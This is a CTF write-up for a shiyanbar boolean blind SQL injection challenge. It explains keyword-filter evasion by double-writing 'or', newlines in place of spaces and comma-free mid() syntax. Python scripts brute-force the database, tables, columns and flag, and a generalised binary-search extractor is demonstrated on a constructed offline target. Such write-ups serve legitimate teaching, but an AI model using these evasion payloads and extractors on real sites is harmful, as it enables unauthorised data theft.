认真一点! (Be serious!) on shiyanbar
The challenge is a fairly simple boolean-based blind injection: there is no error output, only You are in, You are not in, and the WAF's injection warning. I fuzzed it with Burp and found that spaces, union, and, the comma and a few others are filtered, while or is not. So we try or, and still get You are not in. Why? If or is not blocked, the server is most likely deleting it from the input before building the query, which suggests trying mixed case or double-writing. The WP I followed also says that * appears to be changed by the backend: id=0'oorr'1'='1 gives You are in, while id=0'oorr'1'='1/**/ gives You are not in, so /**/ cannot be used in place of the space. One caveat on that test: the id value is wrapped in single quotes, so the trailing /**/ lands inside the closing quote and the comparison becomes '1'='1/**/', which is false whether or not anything was filtered; it does not by itself show that * is touched, and the database-name script below does use select/**/database(). The later scripts sidestep the question by sending a newline, chr(0x0a), in place of every space, which MySQL accepts as whitespace.
That confirms the guess: both double-writing and changing case get past the filter. The rest of the brute force is handed to scripts. Scripts follow:
# database name length
import requests

url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
marker = 'You are in'   # response text when the injected condition is true
for i in range(1, 30):
    # 'oorr' becomes 'or' once the server strips the keyword; no spaces are needed
    key = {'id': "0'oorr(length(database())=%s)oorr'0" % i}
    res = requests.post(url, data=key).text
    print(i)
    if marker in res:
        print('length=%s' % i)
        break
# database name
import requests

marker = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\\{}?!:@#$&[]._"
database = ''
print('start')
for i in range(1, 19):
    for j in guess:
        # mid(x from i for 1) avoids the filtered comma; 'foorr' survives as 'for'
        key = {'id': "0'oorr((mid((select/**/database())from(%s)foorr(1)))='%s')oorr'0" % (i, j)}
        res = requests.post(url, data=key).text
        print('............%s......%s.......' % (i, j))
        if marker in res:
            database += j
            break
print(database)
print("end!")
# table names
import requests

url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
marker = "You are in"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\\{}?!:@#$&[]._"
tables = ''
print('start')
for i in range(1, 15):
    for j in guess:
        # group_concat(... separator '@') joins all table names without a comma;
        # every 'or' (for, separator, information) is double-written
        reg = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0" % (i, j)
        reg = reg.replace(' ', chr(0x0a))   # newline in place of the filtered space
        key = {"id": reg}
        r = requests.post(url, data=key).text
        print(i)
        if marker in r:
            tables += j
            print(tables)
            break
print(tables)
# column names
import requests

url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
marker = "You are in"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\\{}?!:@#$&[]._"
columns = ''
print('start')
for i in range(1, 15):
    for j in guess:
        # same shape as the table query, restricted to the table found above ('fiag')
        reg = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0" % (i, j)
        reg = reg.replace(' ', chr(0x0a))   # newline in place of the filtered space
        key = {"id": reg}
        r = requests.post(url, data=key).text
        print(i)
        if marker in r:
            columns += j
            print(columns)
            break
print(columns)
# data
import requests

url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
marker = "You are in"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\\{}?!:@#$&[]._"
datas = ''
print('start')
for i in range(1, 20):
    for j in guess:
        # read the fl$4g column of fiag one character at a time
        reg = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0" % (i, j)
        reg = reg.replace(' ', chr(0x0a))   # newline in place of the filtered space
        key = {"id": reg}
        r = requests.post(url, data=key).text
        print(i)
        if marker in r:
            datas += j
            print(datas)
            break
print(datas)
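As an added example (my code, not the writeup's scripts), the following Python consolidates the five per-character loops above into one extractor and generalises them: payloads are written as plain MySQL and armoured automatically (each filtered keyword double-written, a newline for every space), and each character is found by binary search on ascii() rather than by trying every charset entry. The filter model (which keywords are deleted, once each, case-sensitively, and in which order) is an assumption drawn from the behaviour described above; the offline stand-in target and its sample database, table and flag values are constructed; only the URL and the You are in marker come from the writeup.

```python
import re

# Assumption: the server deletes each of these once, case-sensitively, in this
# order. The writeup observed the keywords; the order is a guess.
FILTERED = ["union", "and", "or", ",", " "]


def strip_keywords(s: str) -> str:
    """Model of the target's sanitiser: one str.replace pass per keyword."""
    for kw in FILTERED:
        s = s.replace(kw, "")
    return s


def armor(sql: str) -> str:
    """Rewrite clean MySQL so that strip_keywords() hands back the intended query.

    Each filtered keyword is double-written around its midpoint ('or' -> 'oorr',
    'and' -> 'aandnd', 'union' -> 'ununionion'); one deletion leaves the original
    word. Spaces become newlines, which MySQL treats as whitespace. A comma cannot
    be recovered, so queries must use mid(x from i for 1) and
    group_concat(x separator '@') instead.
    """
    if "," in sql:
        raise ValueError("comma is stripped and cannot be armoured")
    out = sql.replace(" ", "\n")
    for kw in ("union", "and", "or"):
        half = len(kw) // 2
        out = out.replace(kw, kw[:half] + kw + kw[half:])
    return out


def wrap(predicate: str) -> str:
    """The writeup's injection shape, id = 0' or (predicate) or '0, armoured."""
    return armor("0'or(%s)or'0" % predicate)


def extract(ask, expr: str, max_len: int = 64) -> str:
    """Recover the string value of a MySQL expression one character at a time.

    ask(predicate) -> bool is the oracle (HTTP round trip or stand-in). Each
    character is found by binary search on ascii(): about 7 requests instead of
    one per charset entry. mid() past the end returns '' and ascii('') is 0,
    which ends the loop.
    """
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if ask("ascii(mid((%s)from(%d)for(1)))>%d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


def http_ask(url: str, marker: str = "You are in"):
    """Oracle for the real page (URL and marker taken from the writeup)."""
    import requests  # imported here so the offline demo needs no network library
    session = requests.Session()

    def ask(predicate: str) -> bool:
        return marker in session.post(url, data={"id": wrap(predicate)}).text
    return ask


# --- constructed offline stand-in for the vulnerable page -------------------
TABLES_EXPR = ("select group_concat(table_name separator '@') "
               "from information_schema.tables where table_schema=database()")
# Constructed sample data, not the real challenge database.
DEMO_VIEWS = {
    "database()": "demo_db",
    TABLES_EXPR: "fiag@users",
    "select fl$4g from fiag": "flag{constructed_sample}",
}
_PRED = re.compile(r"^0'or\(ascii\(mid\(\((.+)\)from\((\d+)\)for\(1\)\)\)>(\d+)\)or'0$", re.S)


def fake_target(views):
    """Stand-in oracle: sanitise the id like the server, then evaluate the one
    predicate shape extract() sends against views (expression -> value).
    A mangled query answers False, like the page's You are not in."""
    def ask(predicate: str) -> bool:
        m = _PRED.match(strip_keywords(wrap(predicate)))
        if not m:
            return False
        expr, pos, n = m.group(1).replace("\n", " "), int(m.group(2)), int(m.group(3))
        value = views.get(expr)
        if value is None:
            return False
        ch = value[pos - 1] if pos <= len(value) else ""
        return (ord(ch) if ch else 0) > n
    return ask


if __name__ == "__main__":
    ask = fake_target(DEMO_VIEWS)
    for expr in ("database()", TABLES_EXPR, "select fl$4g from fiag"):
        print(expr, "->", extract(ask, expr))
    # Live page: ask = http_ask("http://ctf5.shiyanbar.com/web/earnest/index.php")
```

http_ask() gives the same oracle against the live page, after which extract() needs about seven requests per character. The stand-in also doubles as a check on the armouring: if strip_keywords() mangles a payload, the regex fails and every answer is False, which is exactly the You are not in the writeup hit with a bare or.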
A closing comment does not work either; the final - below stands for the space that -- requires:
id=1'-- returns You are not in, since the space is stripped and the comment never takes effect.
Reference WP: https://blog.csdn.net/xiaorouji/article/details/80574986